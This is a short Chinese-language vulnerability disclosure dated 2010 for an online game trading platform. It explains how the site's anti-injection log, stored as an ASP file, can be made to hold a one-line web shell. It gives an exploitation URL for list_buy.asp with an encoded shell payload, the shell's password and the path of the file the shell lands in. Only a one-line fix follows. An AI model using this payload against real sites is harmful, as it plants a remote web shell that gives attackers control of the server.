网游交易平台系统getshell漏洞

发布日期：2010-12.14
发布作者：小钟

影响版本：全部
漏洞类型：SQL注入
漏洞描述：程序防注入系统采用ASP数据库，写入代码可插入一句话木马。

利用方法： 提交 list_buy.asp?class_3=37741+and+┼癥污爠煥敵瑳∨∣┩愾

一句话的密码是#

防注入数据库文件是 /sql_whelpu.asp
 

漏洞修复：临时修改sql_whelpu.asp名称与路径

标签分类： SQL注入